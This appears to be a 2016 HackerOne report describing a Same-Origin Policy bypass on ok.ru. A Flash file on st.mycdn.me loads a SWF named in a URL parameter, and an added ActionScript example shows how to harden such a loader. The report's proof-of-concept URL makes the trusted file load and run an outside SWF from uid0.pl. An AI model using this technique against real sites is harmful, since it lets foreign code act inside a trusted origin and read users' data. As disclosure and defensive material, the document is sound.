ok.ru: Same-Origin Policy Bypass #2

ID H1:102236
Type hackerone
Reporter zoczus
Modified 2016-05-04T12:31:53



This is a really similar issue to my previous report #102234 - the exploitation mechanism is really the same, but another swf file is vulnerable. All conditions are met:

  • st.mycdn.me domain which is in ok.ru crossdomain.xml
  • Security.allowDomain('*')
  • possibility to execute own SWF code provided by URL parameter.

Example of swf code execution: https://st.mycdn.me/static/moderator/6-1-6/Main.swf?retry_timer=30&skip_timer=8500&disableAgeCheck=true&v=55&player=https://uid0.pl/poc/xss.swf (should execute the same code as https://uid0.pl/poc/xss.swf)

I know this report is much shorter and less detailed than the previous one. I also believe I don't need to explain it again because everything is in the previous report and the exploit mechanism is really the same... BUT if you want me to prepare a different PoC for this case - no problem at all.

Have a nice day, JZ
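The three conditions listed in the report (a host trusted by crossdomain.xml, Security.allowDomain('*'), and a child SWF loaded from an attacker-controlled URL parameter) only become exploitable together. The ActionScript 3 document class below is an added example, not code from the report or from ok.ru, showing the two fixes a defender would apply to a loader like Main.swf: restrict allowDomain to the embedding site and check the `player` parameter against an origin allowlist before loading it. The class name, the allowlist contents and the domain names passed to allowDomain are assumptions.

```actionscript
package {
    import flash.display.Loader;
    import flash.display.Sprite;
    import flash.net.URLRequest;
    import flash.system.Security;

    public class HardenedMain extends Sprite {
        // Hypothetical allowlist: the only origins from which a child SWF may be loaded.
        // Entries are scheme + host with no path, compared exactly (see isAllowedOrigin).
        private static const ALLOWED_ORIGINS:Array = ["https://st.mycdn.me"];

        public function HardenedMain() {
            // Weak setting this replaces: Security.allowDomain("*"), which lets a SWF
            // from ANY origin script this one (and therefore reach whatever crossdomain.xml
            // trusts this host for). Grant access only to the site that embeds this SWF.
            Security.allowDomain("ok.ru", "www.ok.ru");   // assumed embedding domains

            // The "player" URL parameter is untrusted input from the page URL.
            var player:String = loaderInfo.parameters["player"];
            if (player == null || !isAllowedOrigin(player)) {
                trace("refusing to load player SWF from an origin outside the allowlist");
                return;
            }
            var loader:Loader = new Loader();
            loader.load(new URLRequest(player));
            addChild(loader);
        }

        // Exact origin match on scheme + host. A prefix test such as
        // url.indexOf("https://st.mycdn.me") == 0 would accept
        // https://st.mycdn.me.example/evil.swf, so the host is isolated first.
        private static function isAllowedOrigin(url:String):Boolean {
            var m:Array = url.match(/^(https:\/\/[^\/?#]+)(?:[\/?#]|$)/i);
            if (m == null) {
                return false;   // not https, or no host component
            }
            var origin:String = String(m[1]).toLowerCase();
            for each (var allowed:String in ALLOWED_ORIGINS) {
                if (origin == allowed) {
                    return true;
                }
            }
            return false;
        }
    }
}
```

With this in place the report's URL (player=https://uid0.pl/poc/xss.swf) is rejected before any Loader.load call, and even a SWF that did get loaded from an unexpected origin would no longer be granted scripting access by a wildcard allowDomain.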